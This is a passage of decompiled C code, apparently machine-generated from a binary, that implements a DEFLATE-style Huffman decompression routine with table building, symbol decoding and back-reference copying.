                  										goto L72;
                  									}
                  									memset( &(_t1350[0x6e0]), 0, 0x120);
                  									_t1303 = _v8;
                  									_t1379 = _t1379 + 0xc;
                  									_t864 = 0;
                  									__eflags = 0;
                  									L74:
                  									_v12 = _t864;
                  									__eflags = _t864 - _t1350[0xd];
                  									if(_t864 >= _t1350[0xd]) {
                  										_t1350[0xd] = 0x13;
                  										L86:
                  										_t865 = _t1350[6];
                  										__eflags = _t865;
                  										if(_t865 < 0) {
                  											L153:
                  											_t1288 = _v16;
                  											L154:
                  											_t1197 = _v36 - _t1288;
                  											__eflags = _t1197 - 4;
                  											if(_t1197 < 4) {
                  												L173:
                  												__eflags = _t1364 - 0xf;
                  												if(_t1364 >= 0xf) {
                  													L178:
                  													_t1198 = _v8;
                  													L179:
                  													_t868 =  *((short*)(_t1350 + 0x160 + (_t1198 & 0x000003ff) * 2));
                  													_v12 = _t868;
                  													__eflags = _t868;
                  													if(_t868 < 0) {
                  														_t1199 = 0xa;
                  														do {
                  															_v12 =  !_v12;
                  															_t872 = (_v8 >> _t1199 & 0x00000001) + _v12;
                  															_t1199 = _t1199 + 1;
                  															_t873 =  *((short*)(_t1350 + 0x960 + _t872 * 2));
                  															_v12 = _t873;
                  															__eflags = _t873;
                  														} while (_t873 < 0);
                  														L191:
                  														_v8 = _v8 >> _t1199;
                  														_t1364 = _t1364 - _t1199;
                  														__eflags = _t873 - 0x100;
                  														if(_t873 >= 0x100) {
                  															L198:
                  															_t874 = _t873 & 0x000001ff;
                  															_v12 = _t874;
                  															__eflags = _t874 - 0x100;
                  															if(_t874 == 0x100) {
                  																goto L62;
                  															}
                  															_t875 = _t874 * 4 - 0x404;
                  															_t1200 =  *(_t875 + 0x411020);
                  															_v56 = _t1200;
                  															_v12 =  *((intOrPtr*)(_t875 + 0x411a58));
                  															__eflags = _t1200;
                  															if(_t1200 == 0) {
                  																L205:
                  																__eflags = _t1364 - 0xf;
                  																if(_t1364 >= 0xf) {
                  																	L210:
                  																	_t1201 = _v8;
                  																	L211:
                  																	_t879 =  *((short*)(_t1350 + 0xf00 + (_t1201 & 0x000003ff) * 2));
                  																	_v28 = _t879;
                  																	__eflags = _t879;
                  																	if(_t879 < 0) {
                  																		_t1121 = _v28;
                  																		_t1321 = _v8;
                  																		_t1202 = 0xa;
                  																		do {
                  																			_t883 = (_t1321 >> _t1202 & 0x00000001) +  !_t1121;
                  																			_t1202 = _t1202 + 1;
                  																			_t1121 =  *((short*)(_t1350 + 0x1700 + _t883 * 2));
                  																			__eflags = _t1121;
                  																		} while (_t1121 < 0);
                  																		_t1288 = _v16;
                  																		_v28 = _t1121;
                  																		_t1113 = _t1121 | 0xffffffff;
                  																		__eflags = _t1113;
                  																		_t884 = _v28;
                  																		L224:
                  																		_v8 = _v8 >> _t1202;
                  																		_t1364 = _t1364 - _t1202;
                  																		_t1203 =  *(0x4110a0 + _t884 * 4);
                  																		_t885 =  *((intOrPtr*)(0x411120 + _t884 * 4));
                  																		_v56 = _t1203;
                  																		_v44 = _t885;
                  																		__eflags = _t1203;
                  																		if(_t1203 == 0) {
                  																			L230:
                  																			_t1205 = _v32 - _a8;
                  																			_v72 = _t1205;
                  																			__eflags = _t885 - _t1205;
                  																			if(_t885 <= _t1205) {
                  																				L232:
                  																				_t1350 = _v64;
                  																				_t1208 = (_t1205 - _t885 & _v68) + _a8;
                  																				__eflags = _v32 - _t1208;
                  																				_t887 =  >  ? _v32 : _t1208;
                  																				_t888 = ( >  ? _v32 : _t1208) + _v12;
                  																				__eflags = ( >  ? _v32 : _t1208) + _v12 - _v60;
                  																				if(( >  ? _v32 : _t1208) + _v12 <= _v60) {
                  																					_t889 = _v12;
                  																					__eflags = _t889 - 9;
                  																					if(_t889 < 9) {
                  																						L246:
                  																						_t1322 = _v32;
                  																						do {
                  																							_t890 =  *_t1208;
                  																							_t1208 = _t1208 + 3;
                  																							 *_t1322 = _t890;
                  																							 *((char*)(_t1322 + 1)) =  *((intOrPtr*)(_t1208 - 2));
                  																							 *((char*)(_t1322 + 2)) =  *((intOrPtr*)(_t1208 - 1));
                  																							_t1322 = _t1322 + 3;
                  																							_t894 = _v12 - 3;
                  																							_v12 = _t894;
                  																							__eflags = _t894 - 2;
                  																						} while (_t894 > 2);
                  																						_v32 = _t1322;
                  																						__eflags = _t894;
                  																						if(_t894 <= 0) {
                  																							goto L153;
                  																						}
                  																						 *_t1322 =  *_t1208;
                  																						_t934 = _v12;
                  																						__eflags = _t934 - 1;
                  																						if(_t934 <= 1) {
                  																							L245:
                  																							_v32 = _t1322 + _t934;
                  																							goto L153;
                  																						}
                  																						L244:
                  																						 *((char*)(_t1322 + 1)) =  *((intOrPtr*)(_t1208 + 1));
                  																						_t934 = _v12;
                  																						goto L245;
                  																					}
                  																					__eflags = _t889 - _v44;
                  																					if(_t889 > _v44) {
                  																						goto L246;
                  																					}
                  																					_t1126 = _v32;
                  																					_t1326 = (_t889 & 0xfffffff8) + _t1208;
                  																					__eflags = _t1326;
                  																					do {
                  																						 *_t1126 =  *_t1208;
                  																						_t937 =  *((intOrPtr*)(_t1208 + 4));
                  																						_t1208 = _t1208 + 8;
                  																						 *((intOrPtr*)(_t1126 + 4)) = _t937;
                  																						_t1126 = _t1126 + 8;
                  																						__eflags = _t1208 - _t1326;
                  																					} while (_t1208 < _t1326);
                  																					_t939 = _v12 & 0x00000007;
                  																					_v32 = _t1126;
                  																					_t1113 = _t1126 | 0xffffffff;
                  																					_v12 = _t939;
                  																					__eflags = _t939 - 3;
                  																					if(_t939 >= 3) {
                  																						goto L246;
                  																					}
                  																					__eflags = _t939;
                  																					if(_t939 == 0) {
                  																						goto L153;
                  																					}
                  																					_t1322 = _v32;
                  																					 *_t1322 =  *_t1208;
                  																					_t934 = _v12;
                  																					__eflags = _t934 - 1;
                  																					if(_t934 <= 1) {
                  																						goto L245;
                  																					}
                  																					goto L244;
                  																				}
                  																				_t1138 = _v12;
                  																				L234:
                  																				_t941 = _t1138;
                  																				_t1138 = _t1138 - 1;
                  																				_v12 = _t1138;
                  																				__eflags = _t941;
                  																				if(_t941 == 0) {
                  																					goto L153;
                  																				}
                  																				L235:
                  																				__eflags = _v32 - _v60;
                  																				if(_v32 >= _v60) {
                  																					_t1113 = 2;
                  																					_v20 = _t1113;
                  																					 *_t1350 = 0x35;
                  																					goto L339;
                  																				}
                  																				_v32 = _v32 + 1;
                  																				_v72 = _v72 + 1;
                  																				 *_v32 =  *((intOrPtr*)((_v72 - _v44 & _v68) + _a8));
                  																				_t1350 = _v64;
                  																				goto L234;
                  																			}
                  																			__eflags = _a20 & 0x00000004;
                  																			if((_a20 & 0x00000004) != 0) {
                  																				L296:
                  																				_v20 = _t1113;
                  																				 *_t1350 = 0x25;
                  																				goto L339;
                  																			}
                  																			goto L232;
                  																		}
                  																		L228:
                  																		__eflags = _t1364 - _t1203;
                  																		if(_t1364 < _t1203) {
                  																			L226:
                  																			__eflags = _t1288 - _v36;
                  																			if(_t1288 >= _v36) {
                  																				 *_t1350 = 0x1b;
                  																				goto L335;
                  																			}
                  																			_t948 = ( *_t1288 & 0x000000ff) << _t1364;
                  																			_t1288 = _t1288 + 1;
                  																			_v8 = _v8 | _t948;
                  																			_t1364 = _t1364 + 8;
                  																			__eflags = _t1364;
                  																			_t1203 = _v56;
                  																			_v16 = _t1288;
                  																			goto L228;
                  																		}
                  																		_t1364 = _t1364 - _t1203;
                  																		_v8 = _v8 >> _t1203;
                  																		_t534 =  &_v44;
                  																		 *_t534 = _v44 + ((_v24 << _t1203) - 0x00000001 & _v8);
                  																		__eflags =  *_t534;
                  																		_t885 = _v44;
                  																		goto L230;
                  																	}
                  																	_t1202 = _t879 >> 9;
                  																	_t884 = _t879 & 0x000001ff;
                  																	goto L224;
                  																}
                  																__eflags = _v36 - _t1288 - 2;
                  																if(_v36 - _t1288 >= 2) {
                  																	_t502 = _t1288 + 1; // 0x83c84d8d
                  																	_t1201 = _v8 | ( *_t502 & 0x000000ff) << _t1364 + 0x00000008 | ( *_v16 & 0x000000ff) << _t1364;
                  																	_t1288 = _v16 + 2;
                  																	_v8 = _t1201;
                  																	_v16 = _t1288;
                  																	_t1364 = _t1364 + 0x10;
                  																	goto L211;
                  																}
                  																L207:
                  																_t960 =  *((short*)(_t1350 + 0xf00 + (_v8 & 0x000003ff) * 2));
                  																_v40 = _t960;
                  																__eflags = _t960;
                  																if(_t960 < 0) {
                  																	__eflags = _t1364 - 0xa;
                  																	if(_t1364 <= 0xa) {
                  																		L217:
                  																		__eflags = _t1288 - _v36;
                  																		if(_t1288 >= _v36) {
                  																			 *_t1350 = 0x1a;
                  																			goto L335;
                  																		}
                  																		_t962 = ( *_t1288 & 0x000000ff) << _t1364;
                  																		_t1288 = _t1288 + 1;
                  																		_t1364 = _t1364 + 8;
                  																		_t1201 = _v8 | _t962;
                  																		_v16 = _t1288;
                  																		_v8 = _t1201;
                  																		__eflags = _t1364 - 0xf;
                  																		if(_t1364 < 0xf) {
                  																			goto L207;
                  																		}
                  																		goto L211;
                  																	}
                  																	_t1216 = 0xa;
                  																	_v28 = _t1216;
                  																	while(1) {
                  																		_t1219 =  *((short*)(_t1350 + 0x1700 + ((_v8 >> _t1216 & _v24) +  !_v40) * 2));
                  																		_t968 = _v28 + 1;
                  																		_v40 = _t1219;
                  																		_v28 = _t968;
                  																		__eflags = _t1219;
                  																		if(_t1219 >= 0) {
                  																			goto L210;
                  																		}
                  																		_t1216 = _v28;
                  																		__eflags = _t1364 - _t968 + 1;
                  																		if(_t1364 >= _t968 + 1) {
                  																			continue;
                  																		}
                  																		goto L217;
                  																	}
                  																	goto L210;
                  																}
                  																_t970 = _t960 >> 9;
                  																__eflags = _t970;
                  																if(_t970 == 0) {
                  																	goto L217;
                  																}
                  																__eflags = _t1364 - _t970;
                  																if(_t1364 < _t970) {
                  																	goto L217;
                  																}
                  																goto L210;
                  															}
                  															L203:
                  															__eflags = _t1364 - _t1200;
                  															if(_t1364 < _t1200) {
                  																L201:
                  																__eflags = _t1288 - _v36;
                  																if(_t1288 >= _v36) {
                  																	 *_t1350 = 0x19;
                  																	goto L335;
                  																}
                  																_t972 = ( *_t1288 & 0x000000ff) << _t1364;
                  																_t1288 = _t1288 + 1;
                  																_v8 = _v8 | _t972;
                  																_t1364 = _t1364 + 8;
                  																__eflags = _t1364;
                  																_t1200 = _v56;
                  																_v16 = _t1288;
                  																goto L203;
                  															}
                  															_t1364 = _t1364 - _t1200;
                  															_v8 = _v8 >> _t1200;
                  															_t474 =  &_v12;
                  															 *_t474 = _v12 + ((_v24 << _t1200) - 0x00000001 & _v8);
                  															__eflags =  *_t474;
                  															goto L205;
                  														}
                  														L194:
                  														_t1221 = _v32;
                  														__eflags = _t1221 - _v60;
                  														if(_t1221 >= _v60) {
                  															_t1113 = 2;
                  															_v20 = _t1113;
                  															 *_t1350 = 0x18;
                  															goto L339;
                  														}
                  														 *_t1221 = _t873;
                  														_t1222 =  &(_t1221[0]);
                  														__eflags = _t1222;
                  														L196:
                  														_v32 = _t1222;
                  														goto L154;
                  													}
                  													_t1199 = _t868 >> 9;
                  													_t873 = _t868 & 0x000001ff;
                  													_v12 = _t873;
                  													goto L191;
                  												}
                  												__eflags = _t1197 - 2;
                  												if(_t1197 >= 2) {
                  													_t1198 = _v8 | ( *(_t1288 + 1) & 0x000000ff) << _t1364 + 0x00000008 | ( *_v16 & 0x000000ff) << _t1364;
                  													_t1288 = _v16 + 2;
                  													_v8 = _t1198;
                  													_v16 = _t1288;
                  													_t1364 = _t1364 + 0x10;
                  													goto L179;
                  												}
                  												L175:
                  												_t900 =  *((short*)(_t1350 + 0x160 + (_v8 & 0x000003ff) * 2));
                  												_v40 = _t900;
                  												__eflags = _t900;
                  												if(_t900 < 0) {
                  													__eflags = _t1364 - 0xa;
                  													if(_t1364 <= 0xa) {
                  														L185:
                  														__eflags = _t1288 - _v36;
                  														if(_t1288 >= _v36) {
                  															 *_t1350 = 0x17;
                  															goto L335;
                  														}
                  														_t902 = ( *_t1288 & 0x000000ff) << _t1364;
                  														_t1288 = _t1288 + 1;
                  														_t1364 = _t1364 + 8;
                  														_t1198 = _v8 | _t902;
                  														_v16 = _t1288;
                  														_v8 = _t1198;
                  														__eflags = _t1364 - 0xf;
                  														if(_t1364 < 0xf) {
                  															goto L175;
                  														}
                  														goto L179;
                  													}
                  													_t1229 = 0xa;
                  													_v28 = _t1229;
                  													while(1) {
                  														_t1232 =  *((short*)(_t1350 + 0x960 + ((_v8 >> _t1229 & _v24) +  !_v40) * 2));
                  														_t908 = _v28 + 1;
                  														_v40 = _t1232;
                  														_v28 = _t908;
                  														__eflags = _t1232;
                  														if(_t1232 >= 0) {
                  															goto L178;
                  														}
                  														_t1229 = _v28;
                  														__eflags = _t1364 - _t908 + 1;
                  														if(_t1364 >= _t908 + 1) {
                  															continue;
                  														}
                  														goto L185;
                  													}
                  													goto L178;
                  												}
                  												_t910 = _t900 >> 9;
                  												__eflags = _t910;
                  												if(_t910 == 0) {
                  													goto L185;
                  												}
                  												__eflags = _t1364 - _t910;
                  												if(_t1364 < _t910) {
                  													goto L185;
                  												}
                  												goto L178;
                  											}
                  											_t1113 = 0xffffffff;
                  											__eflags = _v60 - _v32 - 2;
                  											if(_v60 - _v32 < 2) {
                  												goto L173;
                  											}
                  											__eflags = _t1364 - 0xf;
                  											if(_t1364 >= 0xf) {
                  												_t913 = _v8;
                  											} else {
                  												_t913 = _v8 | (( *(_t1288 + 1) & 0x000000ff) << 0x00000008 |  *_v16 & 0x000000ff) << _t1364;
                  												_t1288 = _v16 + 2;
                  												_v8 = _t913;
                  												_v16 = _t1288;
                  												_t1364 = _t1364 + 0x10;
                  											}
                  											_t915 =  *((short*)(_t1350 + 0x160 + (_t913 & 0x000003ff) * 2));
                  											_v12 = _t915;
                  											__eflags = _t915;
                  											if(_t915 < 0) {
                  												_t1233 = 0xa;
                  												do {
                  													_v12 =  !_v12;
                  													_t919 = (_v8 >> _t1233 & 0x00000001) + _v12;
                  													_t1233 = _t1233 + 1;
                  													_t873 =  *((short*)(_t1350 + 0x960 + _t919 * 2));
                  													_v12 = _t873;
                  													__eflags = _t873;
                  												} while (_t873 < 0);
                  												goto L163;
                  											} else {
                  												_t1233 = _t915 >> 9;
                  												L163:
                  												_v8 = _v8 >> _t1233;
                  												_t1364 = _t1364 - _t1233;
                  												__eflags = _t873 & 0x00000100;
                  												if((_t873 & 0x00000100) != 0) {
                  													goto L198;
                  												}
                  												__eflags = _t1364 - 0xf;
                  												if(_t1364 >= 0xf) {
                  													_t920 = _v8;
                  												} else {
                  													_t920 = _v8 | (( *(_t1288 + 1) & 0x000000ff) << 0x00000008 |  *_v16 & 0x000000ff) << _t1364;
                  													_t1288 = _v16 + 2;
                  													_v8 = _t920;
                  													_v16 = _t1288;
                  													_t1364 = _t1364 + 0x10;
                  												}
                  												_t922 =  *((short*)(_t1350 + 0x160 + (_t920 & 0x000003ff) * 2));
                  												_v28 = _t922;
                  												__eflags = _t922;
                  												if(_t922 < 0) {
                  													_t1234 = 0xa;
                  													_v40 = _t1234;
                  													do {
                  														_t926 = (_v8 >> _t1234 & _v24) +  !_v28;
                  														_t1234 = _v40 + 1;
                  														_v40 = _t1234;
                  														_t873 =  *((short*)(_t1350 + 0x960 + _t926 * 2));
                  														_v28 = _t873;
                  														__eflags = _t873;
                  													} while (_t873 < 0);
                  													goto L171;
                  												} else {
                  													_t1234 = _t922 >> 9;
                  													L171:
                  													_t1364 = _t1364 - _t1234;
                  													_v8 = _v8 >> _t1234;
                  													 *_v32 = _v12;
                  													_t1113 = 0xffffffff;
                  													__eflags = _t873 & 0x00000100;
                  													if((_t873 & 0x00000100) != 0) {
                  														_t456 =  &_v32;
                  														 *_t456 = _v32 + 1;
                  														__eflags =  *_t456;
                  														goto L198;
                  													}
                  													_t1239 = _v32;
                  													 *(_t1239 + 1) = _t873;
                  													_t1222 = _t1239 + 2;
                  													goto L196;
                  												}
                  											}
                  										}
                  										_v20 = 0x40 + _t865 * 0xda0 + _t1350;
                  										memset( &_v212, 0, 0x40);
                  										memset(_v20 + 0x120, 0, 0x800);
                  										memset(_v20 + 0x920, 0, 0x480);
                  										_t1304 = _t1350[6];
                  										_t1244 = 0;
                  										_t1379 = _t1379 + 0x24;
                  										__eflags =  *(_t1350 + 0x2c + _t1304 * 4);
                  										if( *(_t1350 + 0x2c + _t1304 * 4) <= 0) {
                  											L91:
                  											_v28 = _v28 & 0x00000000;
                  											_t1245 = 0;
                  											_v144 = _v144 & 0;
                  											_t189 =  &_v148;
                  											 *_t189 = _v148 & 0;
                  											__eflags =  *_t189;
                  											_t1305 = 4;
                  											do {
                  												_t988 =  *((intOrPtr*)(_t1378 + _t1305 - 0xd0));
                  												_v28 = _v28 + _t988;
                  												_t1245 = _t1245 + _t988 + _t1245 + _t988;
                  												 *((intOrPtr*)(_t1378 + _t1305 - 0x8c)) = _t1245;
                  												_t1305 = _t1305 + 4;
                  												__eflags = _t1305 - 0x3c;
                  											} while (_t1305 <= 0x3c);
                  											__eflags = _t1245 - 0x10000;
                  											if(_t1245 == 0x10000) {
                  												L95:
                  												_t989 = _t1350[6];
                  												_v52 = _v52 & 0x00000000;
                  												_v40 = _t1113;
                  												__eflags =  *(_t1350 + 0x2c + _t989 * 4);
                  												if( *(_t1350 + 0x2c + _t989 * 4) <= 0) {
                  													L117:
                  													__eflags = _t1350[6] - 2;
                  													if(_t1350[6] != 2) {
                  														L152:
                  														_t1350[6] = _t1350[6] - 1;
                  														goto L86;
                  													}
                  													_t1247 = 0;
                  													__eflags = 0;
                  													L119:
                  													_v12 = _t1247;
                  													__eflags = _t1247 - _t1350[0xc] + _t1350[0xb];
                  													if(_t1247 >= _t1350[0xc] + _t1350[0xb]) {
                  														__eflags = _t1350[0xc] + _t1350[0xb] - _t1247;
                  														if(_t1350[0xc] + _t1350[0xb] != _t1247) {
                  															_t1288 = _v16;
                  															L290:
                  															_v20 = _t1113;
                  															 *_t1350 = 0x15;
                  															goto L339;
                  														}
                  														memcpy( &(_t1350[0x10]),  &(_t1350[0xa49]), _t1350[0xb]);
                  														_t999 = _t1350[0xb] + 0x2924 + _t1350;
                  														__eflags = _t999;
                  														memcpy( &(_t1350[0x378]), _t999, _t1350[0xc]);
                  														_t1379 = _t1379 + 0x18;
                  														goto L152;
                  													}
                  													_t1288 = _v16;
                  													__eflags = _t1364 - 0xf;
                  													if(_t1364 >= 0xf) {
                  														L125:
                  														_t1248 = _v8;
                  														L126:
                  														_t1004 =  *((short*)(_t1350 + 0x1ca0 + (_t1248 & 0x000003ff) * 2));
                  														_v44 = _t1004;
                  														__eflags = _t1004;
                  														if(_t1004 < 0) {
                  															_t1249 = 0xa;
                  															do {
                  																_v44 =  !_v44;
                  																_t1008 = (_v8 >> _t1249 & 0x00000001) + _v44;
                  																_t1249 = _t1249 + 1;
                  																_t1009 =  *((short*)(_t1350 + 0x24a0 + _t1008 * 2));
                  																_v44 = _t1009;
                  																__eflags = _t1009;
                  															} while (_t1009 < 0);
                  															L138:
                  															_t1364 = _t1364 - _t1249;
                  															_t1011 = _v8 >> _t1249;
                  															_t1250 = _v44;
                  															_v8 = _t1011;
                  															_v48 = _t1364;
                  															__eflags = _t1250 - 0x10;
                  															if(__eflags >= 0) {
                  																if(__eflags != 0) {
                  																	L142:
                  																	_t1251 =  *((char*)(_t1250 +  &__imp__IsProcessorFeaturePresent));
                  																	_v56 = _t1251;
                  																	__eflags = _t1364 - _t1251;
                  																	if(_t1364 >= _t1251) {
                  																		L146:
                  																		_t1364 = _t1364 - _t1251;
                  																		_v48 = _t1364;
                  																		_t1252 = _v44;
                  																		_v8 = _t1011 >> _t1251;
                  																		_t336 = _t1252 + 0x411008; // 0x0
                  																		_t1310 = ((_v24 << _t1251) - 0x00000001 & _t1011) +  *_t336;
                  																		_t1014 = _v12;
                  																		_v52 = _t1310;
                  																		__eflags = _v44 - 0x10;
                  																		if(_v44 != 0x10) {
                  																			_t1253 = 0;
                  																			__eflags = 0;
                  																		} else {
                  																			_t1253 =  *(_t1014 +  &(_t1350[0xa48])) & 0x000000ff;
                  																		}
                  																		memset(_t1014 + 0x2924 + _t1350, _t1253, _t1310);
                  																		_t1379 = _t1379 + 0xc;
                  																		_t1247 = _v12 + _v52;
                  																		goto L119;
                  																	} else {
                  																		goto L143;
                  																	}
                  																	while(1) {
                  																		L143:
                  																		__eflags = _t1288 - _v36;
                  																		if(_t1288 >= _v36) {
                  																			break;
                  																		}
                  																		_t1019 = ( *_t1288 & 0x000000ff) << _t1364;
                  																		_t1288 = _t1288 + 1;
                  																		_v8 = _v8 | _t1019;
                  																		_t1364 = _t1364 + 8;
                  																		_t1251 = _v56;
                  																		_v16 = _t1288;
                  																		__eflags = _t1364 - _t1251;
                  																		if(_t1364 < _t1251) {
                  																			continue;
                  																		}
                  																		_t1011 = _v8;
                  																		goto L146;
                  																	}
                  																	 *_t1350 = 0x12;
                  																	goto L335;
                  																}
                  																__eflags = _v12;
                  																if(_v12 == 0) {
                  																	L287:
                  																	_v20 = _t1113;
                  																	 *_t1350 = 0x11;
                  																	goto L339;
                  																}
                  																goto L142;
                  															}
                  															_t1256 = _v12;
                  															 *((char*)(_t1256 +  &(_t1350[0xa49]))) = _v44;
                  															_t1247 = _t1256 + 1;
                  															goto L119;
                  														}
                  														_t1249 = _t1004 >> 9;
                  														_v44 = _t1004 & 0x000001ff;
                  														goto L138;
                  													}
                  													__eflags = _v36 - _t1288 - 2;
                  													if(_v36 - _t1288 >= 2) {
                  														_t1248 = _v8 | ( *(_t1288 + 1) & 0x000000ff) << _t1364 + 0x00000008 | ( *_v16 & 0x000000ff) << _t1364;
                  														_t1288 = _v16 + 2;
                  														_v8 = _t1248;
                  														_v16 = _t1288;
                  														_t1364 = _t1364 + 0x10;
                  														goto L126;
                  													}
                  													L122:
                  													_t1029 =  *((short*)(_t1350 + 0x1ca0 + (_v8 & 0x000003ff) * 2));
                  													_v40 = _t1029;
                  													__eflags = _t1029;
                  													if(_t1029 < 0) {
                  														__eflags = _t1364 - 0xa;
                  														if(_t1364 <= 0xa) {
                  															L132:
                  															__eflags = _t1288 - _v36;
                  															if(_t1288 >= _v36) {
                  																 *_t1350 = 0x10;
                  																goto L335;
                  															}
                  															_t1031 = ( *_t1288 & 0x000000ff) << _t1364;
                  															_t1288 = _t1288 + 1;
                  															_t1364 = _t1364 + 8;
                  															_t1248 = _v8 | _t1031;
                  															_v16 = _t1288;
                  															_v8 = _t1248;
                  															__eflags = _t1364 - 0xf;
                  															if(_t1364 < 0xf) {
                  																goto L122;
                  															}
                  															goto L126;
                  														}
                  														_t1263 = 0xa;
                  														_v28 = _t1263;
                  														while(1) {
                  															_t1266 =  *((short*)(_t1350 + 0x24a0 + ((_v8 >> _t1263 & _v24) +  !_v40) * 2));
                  															_t1037 = _v28 + 1;
                  															_v40 = _t1266;
                  															_v28 = _t1037;
                  															__eflags = _t1266;
                  															if(_t1266 >= 0) {
                  																goto L125;
                  															}
                  															_t1263 = _v28;
                  															__eflags = _t1364 - _t1037 + 1;
                  															if(_t1364 >= _t1037 + 1) {
                  																continue;
                  															}
                  															goto L132;
                  														}
                  														goto L125;
                  													}
                  													_t1039 = _t1029 >> 9;
                  													__eflags = _t1039;
                  													if(_t1039 == 0) {
                  														goto L132;
                  													}
                  													__eflags = _t1364 - _t1039;
                  													if(_t1364 < _t1039) {
                  														goto L132;
                  													}
                  													goto L125;
                  												}
                  												_t1375 = _v52;
                  												do {
                  													_t1315 = 0;
                  													_t1267 =  *(_t1375 + _v20) & 0x000000ff;
                  													_v52 = _t1267;
                  													__eflags = _t1267;
                  													if(_t1267 == 0) {
                  														goto L115;
                  													}
                  													_t1124 =  *(_t1378 + _t1267 * 4 - 0x90);
                  													_v28 = _t1267;
                  													 *(_t1378 + _t1267 * 4 - 0x90) = _t1124 + 1;
                  													do {
                  														_t1315 = _t1315 + _t1315 | _t1124 & _v24;
                  														_t1124 = _t1124 >> 1;
                  														_t1044 = _v28 - 1;
                  														_v28 = _t1044;
                  														__eflags = _t1044;
                  													} while (_t1044 != 0);
                  													_t1270 = _v52;
                  													__eflags = _t1270 - 0xa;
                  													if(_t1270 > 0xa) {
                  														_t1046 = _t1315 & 0x000003ff;
                  														_t1124 =  *(_v20 + 0x120 + _t1046 * 2);
                  														_v28 = _t1124;
                  														__eflags = _t1124;
                  														if(_t1124 == 0) {
                  															_t1128 = _v40;
                  															_v28 = _t1128;
                  															 *(_v20 + 0x120 + _t1046 * 2) = _t1128;
                  															_t1124 = _t1128 - 2;
                  															__eflags = _t1124;
                  															_t1350 = _v64;
                  															_v40 = _t1124;
                  														}
                  														_t1317 = _t1315 >> 9;
                  														__eflags = _t1270 - 0xb;
                  														if(_t1270 <= 0xb) {
                  															L114:
                  															_t1320 = (_t1317 >> 0x00000001 & _v24) - _v28;
                  															__eflags = _t1320;
                  															 *(_v20 + 0x91e + _t1320 * 2) = _t1375;
                  															goto L115;
                  														} else {
                  															_t1355 = _v24;
                  															_t244 = _t1270 - 0xb; // -11
                  															_t1127 = _t244;
                  															_t1271 = _v28;
                  															do {
                  																_t1317 = _t1317 >> 1;
                  																_t1051 = 0x48f - _t1271 - (_t1317 & _t1355);
                  																_t1274 =  *(_v20 + 0x91e) & 0x0000ffff;
                  																__eflags = _t1274;
                  																if(_t1274 != 0) {
                  																	_t1271 = _t1274;
                  																} else {
                  																	_t1271 = _v40;
                  																	 *(_v20 + _t1051 * 2) = _t1271;
                  																	_t1355 = _v24;
                  																	_v40 = _t1271 - 2;
                  																}
                  																_t1127 = _t1127 - 1;
                  																__eflags = _t1127;
                  															} while (_t1127 != 0);
                  															_t1350 = _v64;
                  															_v28 = _t1271;
                  															goto L114;
                  														}
                  													}
                  													_v52 = (_t1270 << 0x00000009 | _t1375) & 0x0000ffff;
                  													__eflags = _t1315 - 0x400;
                  													if(_t1315 >= 0x400) {
                  														goto L115;
                  													}
                  													_t1358 = _v52;
                  													_t1124 = _v24 << _t1270;
                  													_t1060 = _v20 + _t1315 * 2 + 0x120;
                  													__eflags = _t1060;
                  													_t1275 = _t1124 + _t1124;
                  													do {
                  														 *_t1060 = _t1358;
                  														_t1315 = _t1315 + _t1124;
                  														_t1060 = _t1060 + _t1275;
                  														__eflags = _t1315 - 0x400;
                  													} while (_t1315 < 0x400);
                  													_t1350 = _v64;
                  													L115:
                  													_t1041 = _t1350[6];
                  													_t1375 = _t1375 + 1;
                  													__eflags = _t1375 -  *((intOrPtr*)(_t1350 + 0x2c + _t1041 * 4));
                  												} while (_t1375 <  *((intOrPtr*)(_t1350 + 0x2c + _t1041 * 4)));
                  												_t1364 = _v48;
                  												_t1113 = _t1124 | 0xffffffff;
                  												__eflags = _t1113;
                  												goto L117;
                  											}
                  											__eflags = _v28 - _v24;
                  											if(_v28 > _v24) {
                  												_t1288 = _v16;
                  												L285:
                  												_v20 = _t1113;
                  												 *_t1350 = 0x23;
                  												goto L339;
                  											}
                  											goto L95;
                  										}
                  										_t1123 = _v20;
                  										do {
                  											 *((intOrPtr*)(_t1378 + ( *(_t1244 + _t1123) & 0x000000ff) * 4 - 0xd0)) =  *((intOrPtr*)(_t1378 + ( *(_t1244 + _t1123) & 0x000000ff) * 4 - 0xd0)) + 1;
                  											_t1244 = _t1244 + 1;
                  											__eflags = _t1244 -  *(_t1350 + 0x2c + _t1304 * 4);
                  										} while (_t1244 <  *(_t1350 + 0x2c + _t1304 * 4));
                  										_t1113 = _t1123 | 0xffffffff;
                  										__eflags = _t1113;
                  										goto L91;
                  									}
                  									__eflags = _t1364 - 3;
                  									if(_t1364 >= 3) {
                  										L80:
                  										_t135 = _t864 + 0x411a34; // 0x121110
                  										_t1277 = _t1303 & 0x00000007;
                  										_t1303 = _t1303 >> 3;
                  										_t1364 = _t1364 - 3;
                  										_v8 = _t1303;
                  										_v48 = _t1364;
                  										 *( &(_t1350[0x6e0]) + ( *_t135 & 0x000000ff)) = _t1277;
                  										_t864 = _v12 + 1;
                  										goto L74;
                  									}
                  									_t1288 = _v16;
                  									while(1) {
                  										L77:
                  										__eflags = _t1288 - _v36;
                  										if(_t1288 >= _v36) {
                  											break;
                  										}
                  										_t1066 = ( *_t1288 & 0x000000ff) << _t1364;
                  										_t1288 = _t1288 + 1;
                  										_v8 = _v8 | _t1066;
                  										_t1364 = _t1364 + 8;
                  										_v16 = _t1288;
                  										__eflags = _t1364 - 3;
                  										if(_t1364 < 3) {
                  											continue;
                  										}
                  										_t864 = _v12;
                  										_t1303 = _v8;
                  										goto L80;
                  									}
                  									 *_t1350 = 0xe;
                  									goto L335;
                  								}
                  								_t1067 = 0x20;
                  								_t1350[0xc] = _t1067;
                  								_t1376 =  &(_t1350[0x10]);
                  								_t1350[0xb] = 0x120;
                  								memset( &(_t1350[0x378]), 5, _t1067);
                  								_t1359 = _v80;
                  								E0040FDD0(_t1376, 8, _t1359);
                  								_t1377 = _t1376 + _t1359;
                  								E0040FDD0(_t1377, 9, 0x70);
                  								_t1279 = 6;
                  								memset(_t1377 + 0x70, 0x7070707, _t1279 << 2);
                  								_t1379 = _t1379 + 0x30;
                  								_t1350 = _v64;
                  								 *((intOrPtr*)(_t1377 + 0x88)) = 0x8080808;
                  								 *((intOrPtr*)(_t1377 + 0x8c)) = 0x8080808;
                  								_t1364 = _v48;
                  								goto L86;
                  							}
                  							_t1075 = _t770 - 1;
                  							__eflags = _t1075;
                  							if(_t1075 == 0) {
                  								goto L304;
                  							}
                  							_t1077 = _t1075;
                  							__eflags = _t1077;
                  							if(_t1077 == 0) {
                  								_t1119 = _v8;
                  								goto L322;
                  							}
                  							_t1078 = _t1077 - 1;
